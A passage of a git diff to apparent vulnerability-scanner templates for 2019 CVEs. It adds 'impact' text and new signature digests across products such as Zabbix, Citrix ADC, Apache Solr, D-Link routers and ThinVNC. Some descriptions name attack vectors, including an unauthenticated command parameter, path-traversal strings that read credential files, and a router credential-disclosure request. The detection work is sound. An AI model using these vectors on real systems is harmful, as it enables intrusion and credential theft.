+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205f81d901102d76bb1d564564c7c6d1af88cff2a42debd95528e96c2533de87bd022100cb954bad9754daa17b2bc5c83cd053920ea751891197bd808519c6b7dbeed5cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220641139086f360568ce18189d24698b73a64a1fdd902cea544b9fa324d8142fa30221009ee0d774ab640a320ed51ef73fb5a02552b208cb446310b9dd87164f7efcd024:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml
index 48682cc0ad..7aa9199c13 100644
--- a/http/cves/2019/CVE-2019-17270.yaml
+++ b/http/cves/2019/CVE-2019-17270.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d653c6daa315a77ba4e1552cbf535bddb3da8c95b4774bfe817184ab18103b2f022100c63d60541ca8592c777c8a2e1c9931ded920bb69d9da664fe7297b0b7989da10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fb655064a8a4f2c5d7151a199cca78bb956a2af76bf28ed8eedebd69872bb52d022100ba1b81c74ee47dc8d4b0a824ec9883d4e59f5e33226f2ffd6108a26e70ade758:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml
index 7a93a64ca9..43a582a54b 100644
--- a/http/cves/2019/CVE-2019-17382.yaml
+++ b/http/cves/2019/CVE-2019-17382.yaml
@@ -5,6 +5,8 @@ info:
   author: harshbothra_
   severity: critical
   description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
   remediation: |
     Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100eeec4ad8858b7a9d4508a3cc068c01bb69e85cd34376647243cd27e10e97d23a0220598a6ca8f89f419ba6812055f6be59725f35729e421dd36ab0022661a67bfe80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022009148e08099a9a28f81197a0f845963b637d2e9de926e8fb42ba01796589aa940221008b4c07a64fa928664caead2aba7bbb52474145d789753f73c61334c487ae218e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml
index fcb2cc6ad8..03addf9f96 100644
--- a/http/cves/2019/CVE-2019-17418.yaml
+++ b/http/cves/2019/CVE-2019-17418.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200c895fd64820e42ef0decf7853ef84768dfae8a28ef29e0385eb6521209873a5022100ae78311655c71f5cc7b08c1184e51c7292e0db8aad76023fa90664a2076717ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022008815697c2a2f0e46275ae35edad5d4cffdf0033069316b2295d78cca4321ff002202c96dc3c1ead18c3b82c219dbc6924224f07f83031b1f162fdc68edfab92ccd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml
index f9a04a2f2d..97879912db 100644
--- a/http/cves/2019/CVE-2019-17444.yaml
+++ b/http/cves/2019/CVE-2019-17444.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
+  impact: |
+    An attacker can gain unauthorized access to the Jfrog Artifactory instance.
   remediation: |
     Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cc1f63be312349f4d57a19c0851e928be1974218c5ea957e87b2e3756308af4b0220425a08a11c2e6b43fed992ac5a27a65e30211c92b0ffdb00b6759ae8b8ef0da7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204f311233143cb862b6bfeb030d02487d9dac7195dedbba7719e1cff964e5f5fa022100e9d135b6138e5ea0d435f07d9f75d558d2f9e5fb53813054699701c550386d7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml
index 0fcb1a5689..755ff768f3 100644
--- a/http/cves/2019/CVE-2019-17506.yaml
+++ b/http/cves/2019/CVE-2019-17506.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210092e6ec9f72047a0e3c2214255e318bc7799430147ab76a527f063fb6cb868ae7022100dac51e7208b1dc8fd11987f9fd585571a7aea40809eee9c2805fe18a2adee36e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b01f2d7c2a7fa05593e3950a06d00aa066e70374a87b779ac9f80af8cacfff9502206f973414bb83ca5949e513f8376d58e0d7324a83e47a151f0df099e234cdcfa5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml
index 646705ec21..9345749c85 100644
--- a/http/cves/2019/CVE-2019-17538.yaml
+++ b/http/cves/2019/CVE-2019-17538.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including system files and credentials.
   remediation: |
     Upgrade Jiangnan Online Judge to a patched version or apply the necessary security patches to fix the Local File Inclusion vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022067c067b8f886b1ea48b8cd787453ded4b3afe65bcf8a9874454d63689ebda797022047dfe6e33b909202f59c02437bb8bebc6973871fbdd06cd2efa362d6f27a6399:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204f60706e3d02d8affe71a62741d7130814f418bf277df913b4c8748fe046e79b022100db5bfdf9c6bf2d95db1602788fed8a97960da3d816f3fb7f7c3db05852b85062:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml
index 18ca5fed2b..30cd43c8b8 100644
--- a/http/cves/2019/CVE-2019-17558.yaml
+++ b/http/cves/2019/CVE-2019-17558.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu,madrobot
   severity: high
   description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability.
   reference:
@@ -70,5 +72,4 @@ http:
         regex:
           - '"name"\:"(.*?)"'
         internal: true
-
-# digest: 4b0a00483046022100d95ae2fde11c073cfb8300dbe88398c8516603bb4a679c01eadd13c285c3934c02210095bb54e1c435ffb3f579c033627a1769da0f8a3db882b32e06bbf44deea77ba3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022005accca962ac4c12f24101db669ad2e776158872e535230ba8223fb6f7c129560220768ea8724a070aca6f98445a3f32620393910ce6dbf13a450610ca26b7bd1396:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml
index 6385a03753..480860f922 100644
--- a/http/cves/2019/CVE-2019-17574.yaml
+++ b/http/cves/2019/CVE-2019-17574.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file").
+  impact: |
+    Unauthenticated attackers can gain administrative access to the WordPress site.
   remediation: |
     Update Popup-Maker plugin to version 1.8.12 or later.
   reference:
@@ -56,4 +58,4 @@ http:
         part: body_2
         words:
           - 'CVE-2019-17574'
-# digest: 4a0a00473045022100930e74c7d4e846de4bb327564aeb12d887b9aa0210983c227feea94e47609671022019afb9ea966a01ecc39af3d76cee2f14280898b2aac1e3a430ddff3f60aed507:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e1254223f22f36a6221929bd834cb41fb808ae8ed2475f90782bdedf04f30c93022057d3d6d979f59e084c6782419f2629c211c2b9a2f6540116cb81c2f20615e50c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml
index 6cbfcdda12..dd845c014d 100644
--- a/http/cves/2019/CVE-2019-17662.yaml
+++ b/http/cves/2019/CVE-2019-17662.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the ThinVNC application.
   remediation: |
     Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f6f38d958680f4a253b85db9955429a1602835dc5e3173f764206b3bef80c9ca022100ef9563dacca1f4c70768b633ede4ba62a364263f240b7d2850650c7a3e0fa404:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f341a7cf907f9f9c76c9b2a38ad97a6dac90dcdd75aa42a46eb13b16f5721f0c022100e329b61436a5002e15fe8a72a000b04e1e31a930e951fa0d8bfd4c8f3a16e29c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml
index ea182d3cbd..b7647f2fde 100644
--- a/http/cves/2019/CVE-2019-18393.yaml
+++ b/http/cves/2019/CVE-2019-18393.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
   remediation: |
     Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203e2fd4e239c9e0f488b6ab649881f0a1a4eb0043da70ffa3ac7ec73a6058cf580220721486a9f1f86019acba6f8df858ac1ced68a9594704ec3e17d6c51262a76a83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022018f97ceb2a856510fb7b94b6fdb9e45998f7deeab627944e2f478b1319afbf3302200c41337c9dbd4ce5da54cbc1c34afd7b83b08e239cc171bd5cdff88396d03c49:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml
index d93e23a978..e1b9d0979d 100644
--- a/http/cves/2019/CVE-2019-18394.yaml
+++ b/http/cves/2019/CVE-2019-18394.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
+  impact: |
+    An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
           - "contains(body, 'Interactsh Server')"
           - status_code == 200
         condition: and
-# digest: 4b0a00483046022100a501157cca85051b4236d0e2b22d7f43fec4ce63266e4efa46f09ff873f43344022100a8ca14098bdffa8f2b9a951584308e46f626a83357fe0b0a64942602e89bb0d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a527f0ea9bcdb000055ed2dbcc170bf51cf90b7990e8a91e31d8893a4f2f0fc1022100fef6cf8de9e2cf74fd4050516cfa6733b80de10981da2d22fbe0ab95a7de6324:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml
index fc03b11635..b8033193e3 100644
--- a/http/cves/2019/CVE-2019-18665.yaml
+++ b/http/cves/2019/CVE-2019-18665.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
   remediation: |
     Apply the latest patch or update to a version that is not affected by this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022065818bd0a45847dd8da278353e39ce7790da314992e30906c4c5f6a22220ecfd0220696205753bf933026784d4bc0daca128bed4c542e749cbb2fb739f964794e540:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c2dbab8172db0968c2e232aca28c3fb50c0e02e3c90174c000a9d85eadfe4b20022100f51b6a0d146624e5578ff18e7b1a8ca48bc704eb817276b8fc865b9f12547e5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml
index 1f62e6763c..90dee86243 100644
--- a/http/cves/2019/CVE-2019-18818.yaml
+++ b/http/cves/2019/CVE-2019-18818.yaml
@@ -5,6 +5,8 @@ info:
   author: idealphase
   severity: critical
   description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
+  impact: |
+    An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel.
   remediation: |
     Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
         json:
           - .user.username
           - .user.email
-# digest: 4b0a0048304602210096b5734518064bf141de9ef3b1c5206620ed664e9766860afa3284d883b5841c022100be439f15bc6f2e9dbf462471c3d1ec31c8b7d5ac4627fd807ba0a429a0de4672:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022044869fadce99b762142471d0ac41df53e66cbe4cc3e91c448bfc84ad7738d8b0022068e4b4eadd2adb05d306a18fb4252814213c58bd69137bce39bb7249df05a912:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml
index f3c5ba88c8..5c65e4d3ec 100644
--- a/http/cves/2019/CVE-2019-18922.yaml
+++ b/http/cves/2019/CVE-2019-18922.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the affected device, leading to unauthorized access and potential data leakage.
   remediation: |
     Apply the latest firmware update provided by Allied Telesis to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008beb9474eb9f821e625de5fb35fb121330c2eecbd66a39606b1cbf437aa5d33902202c900aa7e19a28d442dcbb68d86d08129ee353d37348321359d35a158f4c8bf2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220754a0889c1daf835c35b0fc5b9d2e9ca655437031f89d8d43c7d97510b761581022100f9d342551c22ac56bfd845cd27ad4f4289628b73ea9a19115933c669ea233e8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml
index 0a07ccd3a2..31a33a596e 100644
--- a/http/cves/2019/CVE-2019-18957.yaml
+++ b/http/cves/2019/CVE-2019-18957.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.
   reference:
     - https://seclists.org/bugtraq/2019/Nov/23
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206d119b952d99f7eaafe2d297da491c4e3bed4ba66748bdaa2979cc736ef584c60220773d7886185f34fea4f72f4b696ef6372601864cad449d4c445ae9403169f759:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a68b832b34cecffdc3b576574c7812299df2e7f1345f82e2254424bba38c33f022100aaf4ecd3644d26db4773d27018e5a2c142950c5dfa1bccfd58de7b67b8187f70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml
index 612b8dd742..5ea99c11ee 100644
--- a/http/cves/2019/CVE-2019-1898.yaml
+++ b/http/cves/2019/CVE-2019-1898.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the router.
   remediation: |
     Apply the latest firmware update provided by Cisco to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
           - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'
           - 'contains(header, "application/octet-stream")'
         condition: and
-# digest: 4a0a00473045022057a9241f3ee347d65c80991a9a707897b913113293421b74b38bd1f801503f15022100c43e9a4df08243e8921b5b475c3e5c5cdf3c2696dcab41444c6404c3996921f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220244f92404a070a423a8d23116d8ec6520e0de53df4cea43b584f5f8c4cd08a8702200b32e61f01df37b00cec3391b245e871cfae53f43f3f65be7960960574a122b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml
index cdbcad57db..fb8d51ac60 100644
--- a/http/cves/2019/CVE-2019-19134.yaml
+++ b/http/cves/2019/CVE-2019-19134.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b4eb8ec3e2dc58c27f9dcb826607ac656821f99b1f1b24bcc8f36e3ee3e2949102203afa22e6c43ccbf95b56e008f9f8017410bfadc73cc08af1be428a1794101aa3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b26597595aa46efdfde909d76cff59e40ad192d17c3c03f3c2d6591ec944f0b00221009fa63fd4c76b216d6e85ce129072607a42bc9650a2c1268177314f385594ba08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml
index 0ee85c625b..18c3de9b42 100644
--- a/http/cves/2019/CVE-2019-19368.yaml
+++ b/http/cves/2019/CVE-2019-19368.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022048551b633efaa6c8f3afd3fee506e8a9485eb87f8b691d3d123a7d2b52e1301102200e1b8c4ddb22247c5d83173c33fe638f02956a6bf204899620405612df69d37f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dc52e01413454cab3a2451c0a17c91ae0ed416e40b2cf6f9dabee24a02c6d076022100f0fdcba31d7df0e5d03a2670adb37cc86a8228814ee4891e1a3d14db019b9d86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml
index 7d72678888..f271323586 100644
--- a/http/cves/2019/CVE-2019-1943.yaml
+++ b/http/cves/2019/CVE-2019-1943.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the necessary patches or updates provided by Cisco to fix the open redirect vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 490a0046304402206c0ee6dc31737452387a0a8fa29bdb875086eda10a901c7a6013f3316cbb59fa02201c208d5d9c8653ba0abb1710274465036ee56dc3ec6d052112896419b05e2791:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022044594c848ca90264cd5668e64648d778a16dc39a5a264cb5c7d82d3a8f4cfd7b022038f47c939e1dcf8ea7ceec662c0d3d86cd18c42d57367a1e63301d39daf5e753:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml
index 98be4d7124..889bb14fbb 100644
--- a/http/cves/2019/CVE-2019-19781.yaml
+++ b/http/cves/2019/CVE-2019-19781.yaml
@@ -5,6 +5,8 @@ info:
   author: organiccrap,geeknik
   severity: critical
   description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.
   remediation: |
     Apply the necessary security patches provided by Citrix to fix the directory traversal vulnerability.
   reference:
@@ -41,5 +43,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a004830460221008ba66f8c52100ac5401082fe3f2689a5668c8cbb1ac52fe37ca37f6a09fa89f9022100c822c38a64664678f9a581c2585c25d1347ed30de7e9b2237c9f6e7926297d61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202fd502d71c1bbc9fa616ed7317c8bc8556ce36c9f88dbd45a21b2e306b80acf502204f1737946381e6c9eb9e189a864c73f31b2bf0b212cefd67f5e048853d007a70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml
index e094f120b4..f1e86c31c6 100644
--- a/http/cves/2019/CVE-2019-19824.yaml
+++ b/http/cves/2019/CVE-2019-19824.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a00473045022001df843acf0e07ef597eed131c83004dbc9316ce742fbba3cc68ce703ebec5130221009b0d7529b3de9327a80d935a080971fc1298650e0bda6ef675a577cfd06dfb00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022076f355429984e9480135e5e86fd82e81571b5e19a792e85fc52c369b5e2f93d0022100a2b7d3e0c41ab45dea9c5920f20795a30a79986dc111e23703aa42f88487ab0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml
index af19154b7a..8434057f27 100644
--- a/http/cves/2019/CVE-2019-19908.yaml
+++ b/http/cves/2019/CVE-2019-19908.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c64deb774e3d9119e3e41476bbb60a1040a762290dfb6dca621b1fe3bb4cc0220221009d937d2871c27e35cabd2d666c459ae7ab9f71652d0695889bf2fa12acd93f15:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022021e27425b1df2105de191b27d8485cebe35ca4215e6d0ecb504d63f98ce6575d02207c5f7b097d404f36cb9214006d1bf2d3dae9b858d5ac607916786e144db532a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
